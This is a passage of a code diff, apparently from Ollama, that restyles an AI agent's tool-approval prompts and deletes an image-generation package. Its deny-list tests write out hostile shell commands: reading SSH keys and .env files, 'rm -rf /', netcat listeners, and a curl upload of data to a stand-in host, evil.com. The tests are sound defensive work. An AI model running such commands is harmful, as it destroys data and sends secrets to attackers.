fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
@@ -1019,26 +882,36 @@ func updateSelectorOptions(state *selectorState) {
func updateReasonInput(state *selectorState) {
hintLines := getHintLines(state)
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
boxColor = "\033[91m" // bright red
}
// Move up to the Deny line (3rd option, index 2)
// Cursor is at end of last hint line, need to go up:
// (hint lines - 1) + 1 (blank line) + 1 (Deny is last option)
// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
linesToMove := len(hintLines) - 1 + 1 + 1
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
// Redraw Deny line with reason
denyLabel := "3. Deny: "
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if state.selected == 2 {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
// Blank line + hint
fmt.Fprintf(os.Stderr, "\033[K\r\n")
// Redraw bottom and hint
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
for i, line := range hintLines {
if i == len(hintLines)-1 {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
@@ -1062,10 +935,11 @@ func clearSelectorBox(state *selectorState) {
// fallbackApproval handles approval when terminal control isn't available.
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
fmt.Fprintln(os.Stderr, toolDisplay)
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Allow for this session [3] Deny")
fmt.Fprint(os.Stderr, "choice: ")
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
fmt.Fprint(os.Stderr, "Choice: ")
var input string
fmt.Scanln(&input)
@@ -1108,16 +982,19 @@ func (a *ApprovalManager) AllowedTools() []string {
// FormatApprovalResult returns a formatted string showing the approval result.
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
var label string
displayName := ToolDisplayName(toolName)
var status string
var icon string
switch result.Decision {
case ApprovalOnce:
label = "approved"
status = "Approved"
icon = "\033[32m✓\033[0m"
case ApprovalAlways:
label = "always allowed"
status = "Always allowed"
icon = "\033[32m✓\033[0m"
case ApprovalDeny:
label = "denied"
status = "Denied"
icon = "\033[31m✗\033[0m"
}
// Format based on tool type
@@ -1127,7 +1004,7 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
if len(cmd) > 40 {
cmd = cmd[:37] + "..."
}
return fmt.Sprintf("\033[1m%s:\033[0m %s: %s", label, displayName, cmd)
return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
}
}
@@ -1137,11 +1014,11 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
if len(query) > 40 {
query = query[:37] + "..."
}
return fmt.Sprintf("\033[1m%s:\033[0m %s: %s", label, displayName, query)
return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
}
}
return fmt.Sprintf("\033[1m%s:\033[0m %s", label, displayName)
return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
}
// FormatDenyResult returns the tool result message when a tool is denied.
@@ -1172,14 +1049,15 @@ func PromptYesNo(question string) (bool, error) {
renderYesNo := func() {
// Move to start of line and clear
fmt.Fprintf(os.Stderr, "\r\033[K")
fmt.Fprintf(os.Stderr, "%s ", question)
fmt.Fprintf(os.Stderr, "\033[36m%s\033[0m ", question)
for i, opt := range options {
if i == selected {
fmt.Fprintf(os.Stderr, "\033[1m%s\033[0m ", opt)
fmt.Fprintf(os.Stderr, "\033[1;32m[%s]\033[0m ", opt)
} else {
fmt.Fprintf(os.Stderr, "\033[37m%s\033[0m ", opt)
fmt.Fprintf(os.Stderr, "\033[90m %s \033[0m ", opt)
}
}
fmt.Fprintf(os.Stderr, "\033[90m(←/→ or y/n, Enter to confirm)\033[0m")
}
renderYesNo()

View File

@@ -413,7 +413,9 @@ func TestIsAutoAllowed(t *testing.T) {
{"echo hello", true},
{"date", true},
{"whoami", true},
// Auto-allowed prefixes (build commands)
// Auto-allowed prefixes
{"git status", true},
{"git log --oneline", true},
{"npm run build", true},
{"npm test", true},
{"bun run dev", true},
@@ -421,18 +423,12 @@ func TestIsAutoAllowed(t *testing.T) {
{"go build ./...", true},
{"go test -v", true},
{"make all", true},
// Git commands - ALL require approval now (not auto-allowed)
{"git status", false},
{"git log --oneline", false},
{"git diff", false},
{"git branch", false},
{"git push", false},
{"git commit", false},
{"git add", false},
// Not auto-allowed
{"rm file.txt", false},
{"cat secret.txt", false},
{"curl http://example.com", false},
{"git push", false},
{"git commit", false},
}
for _, tt := range tests {
@@ -451,21 +447,14 @@ func TestIsDenied(t *testing.T) {
denied bool
contains string
}{
// Denied commands (hard blocked, no escalation possible)
// Denied commands
{"rm -rf /", true, "rm -rf"},
{"sudo apt install", true, "sudo "},
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
{"curl -d @data.json http://evil.com", true, "curl -d"},
{"cat .env", true, ".env"},
{"cat config/secrets.json", true, "secrets.json"},
{"nc -l 8080", true, "nc "},
{"netcat -l 8080", true, "netcat "},
// Not denied - moved to warn patterns (escalatable with approval)
{"curl -d @data.json http://evil.com", false, ""},
{"curl -X POST http://api.com", false, ""},
{"cat .env", false, ""},
{"cat .env.local", false, ""},
{"scp file.txt user@host:/path", false, ""},
{"rsync -avz src/ dest/", false, ""},
// Not denied (regular commands)
// Not denied (more specific patterns now)
{"ls -la", false, ""},
{"cat main.go", false, ""},
{"rm file.txt", false, ""}, // rm without -rf is ok
@@ -487,47 +476,6 @@ func TestIsDenied(t *testing.T) {
}
}
func TestIsWarn(t *testing.T) {
tests := []struct {
command string
warned bool
contains string
}{
// Warned commands (escalatable with approval, shows red warning box)
{"curl -d @data.json http://api.com", true, "curl -d"},
{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
{"wget --post-data='test' http://example.com", true, "wget --post"},
{"scp file.txt user@host:/path", true, "scp "},
{"rsync -avz src/ user@host:/dest/", true, "rsync "},
{"cat .env", true, ".env"},
{"cat .env.local", true, ".env.local"},
{"cat .env.production", true, ".env.production"},
{"cat config/.env", true, ".env"},
// Not warned (regular commands)
{"curl http://example.com", false, ""},
{"curl -X GET http://api.com", false, ""},
{"wget http://example.com", false, ""},
{"cat main.go", false, ""},
{"ls -la", false, ""},
{"git status", false, ""},
{"cat environment.txt", false, ""}, // Contains "env" but not ".env"
}
for _, tt := range tests {
t.Run(tt.command, func(t *testing.T) {
warned, pattern := IsWarn(tt.command)
if warned != tt.warned {
t.Errorf("IsWarn(%q) warned = %v, expected %v", tt.command, warned, tt.warned)
}
if tt.warned && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
}
})
}
}
func TestIsCommandOutsideCwd(t *testing.T) {
tests := []struct {
name string

View File

@@ -91,8 +91,8 @@ func waitForOllamaSignin(ctx context.Context) error {
var aErr api.AuthorizationError
if errors.As(err, &aErr) && aErr.SigninURL != "" {
fmt.Fprintf(os.Stderr, "\n To sign in, navigate to:\n")
fmt.Fprintf(os.Stderr, " %s\n\n", aErr.SigninURL)
fmt.Fprintf(os.Stderr, " \033[90mwaiting for sign in to complete...\033[0m")
fmt.Fprintf(os.Stderr, " \033[36m%s\033[0m\n\n", aErr.SigninURL)
fmt.Fprintf(os.Stderr, " \033[90mWaiting for sign in to complete...\033[0m")
// Poll until auth succeeds
ticker := time.NewTicker(2 * time.Second)
@@ -106,7 +106,7 @@ func waitForOllamaSignin(ctx context.Context) error {
case <-ticker.C:
user, whoamiErr := client.Whoami(ctx)
if whoamiErr == nil && user != nil && user.Name != "" {
fmt.Fprintf(os.Stderr, "\r\033[K\033[A\r\033[K \033[1msigned in:\033[0m %s\n", user.Name)
fmt.Fprintf(os.Stderr, "\r\033[K \033[32mSigned in as %s\033[0m\n", user.Name)
return nil
}
// Still waiting, show dot
@@ -137,6 +137,13 @@ type RunOptions struct {
// YoloMode skips all tool approval prompts
YoloMode bool
// LastToolOutput stores the full output of the last tool execution
// for Ctrl+O expansion. Updated by Chat(), read by caller.
LastToolOutput *string
// LastToolOutputTruncated stores the truncated version shown inline
LastToolOutputTruncated *string
}
// Chat runs an agent chat loop with tool support.
@@ -264,12 +271,12 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
var authErr api.AuthorizationError
if errors.As(err, &authErr) {
p.StopAndClear()
fmt.Fprintf(os.Stderr, "\033[1mauth required:\033[0m cloud model requires authentication\n")
fmt.Fprintf(os.Stderr, "\033[33mAuthentication required to use this cloud model.\033[0m\n")
result, promptErr := agent.PromptYesNo("Sign in to Ollama?")
if promptErr == nil && result {
if signinErr := waitForOllamaSignin(ctx); signinErr == nil {
// Retry the chat request
fmt.Fprintf(os.Stderr, "\033[90mretrying...\033[0m\n")
fmt.Fprintf(os.Stderr, "\033[90mRetrying...\033[0m\n")
continue // Retry the loop
}
}
@@ -283,11 +290,11 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
p.StopAndClear()
if consecutiveErrors >= 3 {
fmt.Fprintf(os.Stderr, "\033[1merror:\033[0m too many consecutive errors, giving up\n")
fmt.Fprintf(os.Stderr, "\033[31m✗ Too many consecutive errors, giving up\033[0m\n")
return nil, fmt.Errorf("too many consecutive server errors: %s", statusErr.ErrorMessage)
}
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m server error (attempt %d/3): %s\n", consecutiveErrors, statusErr.ErrorMessage)
fmt.Fprintf(os.Stderr, "\033[33m⚠ Server error (attempt %d/3): %s\033[0m\n", consecutiveErrors, statusErr.ErrorMessage)
// Include both the model's response and the error so it can learn
assistantContent := fullResponse.String()
@@ -353,8 +360,8 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
if cmd, ok := args["command"].(string); ok {
// Check if command is denied (dangerous pattern)
if denied, pattern := agent.IsDenied(cmd); denied {
fmt.Fprintf(os.Stderr, "\033[1mblocked:\033[0m %s\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, " matches dangerous pattern: %s\n", pattern)
fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: agent.FormatDeniedResult(cmd, pattern),
@@ -365,7 +372,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
// Check if command is auto-allowed (safe command)
if agent.IsAutoAllowed(cmd) {
fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
skipApproval = true
}
}
@@ -375,7 +382,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
// In yolo mode, skip all approval prompts
if opts.YoloMode {
if !skipApproval {
fmt.Fprintf(os.Stderr, "\033[1mrunning:\033[0m %s\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
}
} else if !skipApproval && !approval.IsAllowed(toolName, args) {
result, err := approval.RequestApproval(toolName, args)
@@ -405,7 +412,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
}
} else if !skipApproval {
// Already allowed - show running indicator
fmt.Fprintf(os.Stderr, "\033[1mrunning:\033[0m %s\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
}
// Execute the tool
@@ -414,13 +421,13 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
// Check if web search needs authentication
if errors.Is(err, tools.ErrWebSearchAuthRequired) {
// Prompt user to sign in
fmt.Fprintf(os.Stderr, "\033[1mauth required:\033[0m web search requires authentication\n")
fmt.Fprintf(os.Stderr, "\033[33m Web search requires authentication.\033[0m\n")
result, promptErr := agent.PromptYesNo("Sign in to Ollama?")
if promptErr == nil && result {
// Get signin URL and wait for auth completion
if signinErr := waitForOllamaSignin(ctx); signinErr == nil {
// Retry the web search
fmt.Fprintf(os.Stderr, "\033[90mretrying web search...\033[0m\n")
fmt.Fprintf(os.Stderr, "\033[90m Retrying web search...\033[0m\n")
toolResult, err = toolRegistry.Execute(call)
if err == nil {
goto toolSuccess
@@ -428,7 +435,7 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
}
}
}
fmt.Fprintf(os.Stderr, "\033[1merror:\033[0m %v\n", err)
fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: fmt.Sprintf("Error: %v", err),
@@ -439,15 +446,25 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
toolSuccess:
// Display tool output (truncated for display)
truncatedOutput := ""
if toolResult != "" {
output := toolResult
if len(output) > 300 {
output = output[:300] + "... (truncated)"
output = output[:300] + "... (truncated, press Ctrl+O to expand)"
}
truncatedOutput = output
// Show result in grey, indented
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
}
// Store full and truncated output for Ctrl+O toggle
if opts.LastToolOutput != nil {
*opts.LastToolOutput = toolResult
}
if opts.LastToolOutputTruncated != nil {
*opts.LastToolOutputTruncated = truncatedOutput
}
// Truncate output to prevent context overflow
toolResultForLLM := truncateToolOutput(toolResult, opts.Model)
@@ -499,18 +516,17 @@ func truncateUTF8(s string, limit int) string {
// formatToolShort returns a short description of a tool call.
func formatToolShort(toolName string, args map[string]any) string {
displayName := agent.ToolDisplayName(toolName)
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
return fmt.Sprintf("%s: %s", displayName, truncateUTF8(cmd, 50))
return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
}
}
if toolName == "web_search" {
if query, ok := args["query"].(string); ok {
return fmt.Sprintf("%s: %s", displayName, truncateUTF8(query, 50))
return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
}
}
return displayName
return toolName
}
// Helper types and functions for display
@@ -650,7 +666,7 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
// Check if model supports tools
supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
if err != nil {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m could not check model capabilities: %v\n", err)
fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
supportsTools = false
}
@@ -659,13 +675,13 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
if supportsTools {
toolRegistry = tools.DefaultRegistry()
if toolRegistry.Count() > 0 {
fmt.Fprintf(os.Stderr, "\033[90mtools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
fmt.Fprintf(os.Stderr, "\033[90mTools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
}
if yoloMode {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m yolo mode - all tool approvals will be skipped\n")
fmt.Fprintf(os.Stderr, "\033[33m⚠ YOLO mode: All tool approvals will be skipped\033[0m\n")
}
} else {
fmt.Fprintf(os.Stderr, "\033[1mnote:\033[0m model does not support tools - running in chat-only mode\n")
fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
}
// Create approval manager for session
@@ -674,6 +690,11 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
var messages []api.Message
var sb strings.Builder
// Track last tool output for Ctrl+O toggle
var lastToolOutput string
var lastToolOutputTruncated string
var toolOutputExpanded bool
for {
line, err := scanner.Readline()
switch {
@@ -686,6 +707,20 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
}
sb.Reset()
continue
case errors.Is(err, readline.ErrExpandOutput):
// Ctrl+O pressed - toggle between expanded and collapsed tool output
if lastToolOutput == "" {
fmt.Fprintf(os.Stderr, "\033[90mNo tool output to expand\033[0m\n")
} else if toolOutputExpanded {
// Currently expanded, show truncated
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(lastToolOutputTruncated, "\n", "\n "))
toolOutputExpanded = false
} else {
// Currently collapsed, show full
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(lastToolOutput, "\n", "\n "))
toolOutputExpanded = true
}
continue
case err != nil:
return err
}
@@ -724,17 +759,21 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
messages = append(messages, newMessage)
opts := RunOptions{
Model: modelName,
Messages: messages,
WordWrap: wordWrap,
Options: options,
Think: think,
HideThinking: hideThinking,
KeepAlive: keepAlive,
Tools: toolRegistry,
Approval: approval,
YoloMode: yoloMode,
Model: modelName,
Messages: messages,
WordWrap: wordWrap,
Options: options,
Think: think,
HideThinking: hideThinking,
KeepAlive: keepAlive,
Tools: toolRegistry,
Approval: approval,
YoloMode: yoloMode,
LastToolOutput: &lastToolOutput,
LastToolOutputTruncated: &lastToolOutputTruncated,
}
// Reset expanded state for new tool execution
toolOutputExpanded = false
assistant, err := Chat(cmd.Context(), opts)
if err != nil {

38
x/imagegen/.gitignore vendored
View File

@@ -1,38 +0,0 @@
# Build directories
build/
dist/
# CMake
CMakeCache.txt
CMakeFiles/
cmake_install.cmake
Makefile
*.cmake
# IDE
.idea/
.vscode/
*.swp
*.swo
*~
# macOS
.DS_Store
*.dSYM/
# Go
*.exe
*.exe~
*.dll
*.so
*.dylib
# Python
*.npy
/engine
weights
outputs
prompt.txt
negative.txt

View File

@@ -1,61 +0,0 @@
# imagegen
This is a package that uses MLX to run image generation models, ahead of being integrated into Ollama's primary runner.
in `CMakeLists.txt` and rebuild.
### 1. Download a Model
Download Llama 3.1 8B (or any compatible model) in safetensors format:
```bash
mkdir -p ./weights
# Example using huggingface-cli
hf download meta-llama/Llama-3.1-8B --local-dir ./weights/Llama-3.1-8B
hf download openai/gpt-oss-20b --local-dir ./weights/gpt-oss-20b
```
### 2. Run Inference
```bash
# Build
go build ./cmd/engine
# Text generation
./engine -model ./weights/Llama-3.1-8B -prompt "Hello, world!" -max-tokens 250
# Qwen-Image 2512 (text-to-image)
./engine -qwen-image -model ./weights/Qwen-Image-2512 -prompt "A mountain landscape at sunset" \
-width 1024 -height 1024 -steps 20 -seed 42 -output landscape.png
# Qwen-Image Edit (experimental) - 8 steps for speed, but model recommends 50
./engine -qwen-image-edit -model ./weights/Qwen-Image-Edit-2511 \
-input-image input.png -prompt "Make it winter" -negative-prompt " " -cfg-scale 4.0 \
-steps 8 -seed 42 -output edited.png
```
## Memory Management
MLX Python/C++ uses scope-based memory management - arrays are freed when they go out of scope. Go's garbage collector is non-deterministic, so we can't rely on finalizers to free GPU memory promptly.
Instead, arrays are automatically tracked and freed on `Eval()`:
```go
// All arrays are automatically tracked when created
x := mlx.Add(a, b)
y := mlx.Matmul(x, w)
// Eval frees non-kept arrays, evaluates outputs (auto-kept)
mlx.Eval(y)
// After copying to CPU, free the array
data := y.Data()
y.Free()
```
Key points:
- All created arrays are automatically tracked
- `mlx.Eval(outputs...)` frees non-kept arrays, evaluates outputs (outputs auto-kept)
- `mlx.Keep(arrays...)` marks arrays to survive multiple Eval cycles (for weights, caches)
- Call `.Free()` when done with an array

View File

@@ -1,156 +0,0 @@
//go:build mlx
package cache
import "github.com/ollama/ollama/x/imagegen/mlx"
type Cache interface {
Update(k, v *mlx.Array, seqLen int) (*mlx.Array, *mlx.Array)
Offset() int
Len() int
State() []*mlx.Array
}
type KVCache struct {
keys, values *mlx.Array
offset int
step int
}
func NewKVCache() *KVCache {
return &KVCache{step: 256}
}
func (c *KVCache) Update(k, v *mlx.Array, seqLen int) (*mlx.Array, *mlx.Array) {
prev := c.offset
shape := k.Shape()
B, H, Dk := shape[0], shape[1], shape[3]
Dv := v.Shape()[3]
// Grow buffer if needed
if c.keys == nil || (prev+seqLen) > int(c.keys.Shape()[2]) {
nSteps := (c.step + seqLen - 1) / c.step
newK := mlx.Zeros([]int32{B, H, int32(nSteps * c.step), Dk}, k.Dtype())
newV := mlx.Zeros([]int32{B, H, int32(nSteps * c.step), Dv}, v.Dtype())
if c.keys != nil {
if prev%c.step != 0 {
c.keys = mlx.Slice(c.keys, []int32{0, 0, 0, 0}, []int32{B, H, int32(prev), Dk})
c.values = mlx.Slice(c.values, []int32{0, 0, 0, 0}, []int32{B, H, int32(prev), Dv})
}
c.keys = mlx.Concatenate([]*mlx.Array{c.keys, newK}, 2)
c.values = mlx.Concatenate([]*mlx.Array{c.values, newV}, 2)
} else {
c.keys, c.values = newK, newV
}
}
c.offset += seqLen
c.keys = mlx.SliceUpdateInplace(c.keys, k, []int32{0, 0, int32(prev), 0}, []int32{B, H, int32(c.offset), Dk})
c.values = mlx.SliceUpdateInplace(c.values, v, []int32{0, 0, int32(prev), 0}, []int32{B, H, int32(c.offset), Dv})
return mlx.Slice(c.keys, []int32{0, 0, 0, 0}, []int32{B, H, int32(c.offset), Dk}),
mlx.Slice(c.values, []int32{0, 0, 0, 0}, []int32{B, H, int32(c.offset), Dv})
}
func (c *KVCache) State() []*mlx.Array {
if c.keys == nil {
return nil
}
return []*mlx.Array{c.keys, c.values}
}
func (c *KVCache) Offset() int { return c.offset }
func (c *KVCache) Len() int { return c.offset }
// RotatingKVCache implements sliding window attention with bounded memory
type RotatingKVCache struct {
keys, values *mlx.Array
offset int
maxSize int
step int
idx int
}
func NewRotatingKVCache(maxSize int) *RotatingKVCache {
return &RotatingKVCache{maxSize: maxSize, step: 256}
}
func (c *RotatingKVCache) Update(k, v *mlx.Array, seqLen int) (*mlx.Array, *mlx.Array) {
if seqLen > 1 {
return c.updateConcat(k, v, seqLen)
}
return c.updateInPlace(k, v)
}
func (c *RotatingKVCache) updateInPlace(k, v *mlx.Array) (*mlx.Array, *mlx.Array) {
shape := k.Shape()
B, H, Dk := shape[0], shape[1], shape[3]
Dv := v.Shape()[3]
// Grow buffer if not yet at max
if c.keys == nil || (c.idx >= int(c.keys.Shape()[2]) && int(c.keys.Shape()[2]) < c.maxSize) {
var cap int
if c.keys != nil {
cap = int(c.keys.Shape()[2])
}
newSize := min(c.step, c.maxSize-cap)
newK := mlx.Zeros([]int32{B, H, int32(newSize), Dk}, k.Dtype())
newV := mlx.Zeros([]int32{B, H, int32(newSize), Dv}, v.Dtype())
if c.keys != nil {
c.keys = mlx.Concatenate([]*mlx.Array{c.keys, newK}, 2)
c.values = mlx.Concatenate([]*mlx.Array{c.values, newV}, 2)
} else {
c.keys, c.values = newK, newV
}
}
// Rotate when hitting max
if c.idx >= c.maxSize {
c.idx = 0
}
c.keys = mlx.SliceUpdateInplace(c.keys, k, []int32{0, 0, int32(c.idx), 0}, []int32{B, H, int32(c.idx + 1), Dk})
c.values = mlx.SliceUpdateInplace(c.values, v, []int32{0, 0, int32(c.idx), 0}, []int32{B, H, int32(c.idx + 1), Dv})
c.offset++
c.idx++
validLen := int32(min(c.offset, c.maxSize))
return mlx.Slice(c.keys, []int32{0, 0, 0, 0}, []int32{B, H, validLen, Dk}),
mlx.Slice(c.values, []int32{0, 0, 0, 0}, []int32{B, H, validLen, Dv})
}
func (c *RotatingKVCache) updateConcat(k, v *mlx.Array, seqLen int) (*mlx.Array, *mlx.Array) {
shape := k.Shape()
B, H, Dk := shape[0], shape[1], shape[3]
Dv := v.Shape()[3]
if c.keys == nil {
c.keys, c.values = k, v
} else {
c.keys = mlx.Concatenate([]*mlx.Array{c.keys, k}, 2)
c.values = mlx.Concatenate([]*mlx.Array{c.values, v}, 2)
}
c.offset += seqLen
// Trim to max_size to maintain sliding window
cap := int(c.keys.Shape()[2])
if trim := cap - c.maxSize; trim > 0 {
c.keys = mlx.Slice(c.keys, []int32{0, 0, int32(trim), 0}, []int32{B, H, int32(cap), Dk})
c.values = mlx.Slice(c.values, []int32{0, 0, int32(trim), 0}, []int32{B, H, int32(cap), Dv})
}
c.idx = int(c.keys.Shape()[2])
return c.keys, c.values
}
func (c *RotatingKVCache) State() []*mlx.Array {
if c.keys == nil {
return nil
}
return []*mlx.Array{c.keys, c.values}
}
func (c *RotatingKVCache) Offset() int { return c.offset }
func (c *RotatingKVCache) Len() int { return min(c.offset, c.maxSize) }

View File

@@ -1,164 +0,0 @@
//go:build mlx
package cache
import "github.com/ollama/ollama/x/imagegen/mlx"
// StepCache caches layer outputs across diffusion denoising steps.
// Based on DeepCache (CVPR 2024) and Learning-to-Cache (NeurIPS 2024):
// shallow layers change little between consecutive steps, so we can
// cache their outputs and skip recomputation on non-refresh steps.
//
// Supports both single-stream (Z-Image) and dual-stream (Qwen-Image) architectures:
// - Single-stream: use Get/Set for the single output per layer
// - Dual-stream: use Get/Set for stream 1 (imgH), Get2/Set2 for stream 2 (txtH)
//
// Usage (single-stream):
//
// cache := NewStepCache(15) // cache first 15 layers
// for step := 0; step < numSteps; step++ {
// refresh := cache.ShouldRefresh(step, 3) // refresh every 3 steps
// for i, layer := range layers {
// if i < 15 && !refresh && cache.Get(i) != nil {
// output = cache.Get(i) // reuse cached
// } else {
// output = layer.Forward(input)
// if i < 15 && refresh {
// cache.Set(i, output)
// }
// }
// }
// }
// cache.Free() // cleanup when done
//
// Usage (dual-stream):
//
// cache := NewStepCache(15)
// for step := 0; step < numSteps; step++ {
// refresh := cache.ShouldRefresh(step, 3)
// for i, layer := range layers {
// if i < 15 && !refresh && cache.Get(i) != nil {
// imgH, txtH = cache.Get(i), cache.Get2(i)
// } else {
// imgH, txtH = layer.Forward(imgH, txtH, ...)
// if i < 15 && refresh {
// cache.Set(i, imgH)
// cache.Set2(i, txtH)
// }
// }
// }
// }
type StepCache struct {
layers []*mlx.Array // cached layer outputs (stream 1)
layers2 []*mlx.Array // cached layer outputs (stream 2, for dual-stream models)
constant *mlx.Array // optional constant (e.g., text embeddings)
}
// NewStepCache creates a cache for the given number of layers.
func NewStepCache(numLayers int) *StepCache {
return &StepCache{
layers: make([]*mlx.Array, numLayers),
layers2: make([]*mlx.Array, numLayers),
}
}
// ShouldRefresh returns true if the cache should be refreshed at this step.
// Refresh happens on step 0, interval, 2*interval, etc.
func (c *StepCache) ShouldRefresh(step, interval int) bool {
return step%interval == 0
}
// Get returns the cached output for a layer, or nil if not cached.
func (c *StepCache) Get(layer int) *mlx.Array {
if layer < len(c.layers) {
return c.layers[layer]
}
return nil
}
// Set stores a layer output (stream 1), freeing any previous value.
func (c *StepCache) Set(layer int, arr *mlx.Array) {
if layer < len(c.layers) {
if c.layers[layer] != nil {
c.layers[layer].Free()
}
c.layers[layer] = arr
}
}
// Get2 returns the cached output for a layer (stream 2), or nil if not cached.
// Used for dual-stream architectures like Qwen-Image.
func (c *StepCache) Get2(layer int) *mlx.Array {
if layer < len(c.layers2) {
return c.layers2[layer]
}
return nil
}
// Set2 stores a layer output (stream 2), freeing any previous value.
// Used for dual-stream architectures like Qwen-Image.
func (c *StepCache) Set2(layer int, arr *mlx.Array) {
if layer < len(c.layers2) {
if c.layers2[layer] != nil {
c.layers2[layer].Free()
}
c.layers2[layer] = arr
}
}
// GetConstant returns the cached constant value.
func (c *StepCache) GetConstant() *mlx.Array {
return c.constant
}
// SetConstant stores a constant value, freeing any previous value.
func (c *StepCache) SetConstant(arr *mlx.Array) {
if c.constant != nil {
c.constant.Free()
}
c.constant = arr
}
// Arrays returns all non-nil cached arrays (for pool.Keep).
func (c *StepCache) Arrays() []*mlx.Array {
var result []*mlx.Array
if c.constant != nil {
result = append(result, c.constant)
}
for _, arr := range c.layers {
if arr != nil {
result = append(result, arr)
}
}
for _, arr := range c.layers2 {
if arr != nil {
result = append(result, arr)
}
}
return result
}
// Free releases all cached arrays. Call when generation completes.
func (c *StepCache) Free() {
if c.constant != nil {
c.constant.Free()
c.constant = nil
}
for i, arr := range c.layers {
if arr != nil {
arr.Free()
c.layers[i] = nil
}
}
for i, arr := range c.layers2 {
if arr != nil {
arr.Free()
c.layers2[i] = nil
}
}
}
// NumLayers returns the number of layers this cache can store.
func (c *StepCache) NumLayers() int {
return len(c.layers)
}

View File

@@ -1,359 +0,0 @@
//go:build mlx
package main
import (
"context"
"fmt"
"time"
"unicode/utf8"
"github.com/ollama/ollama/x/imagegen/cache"
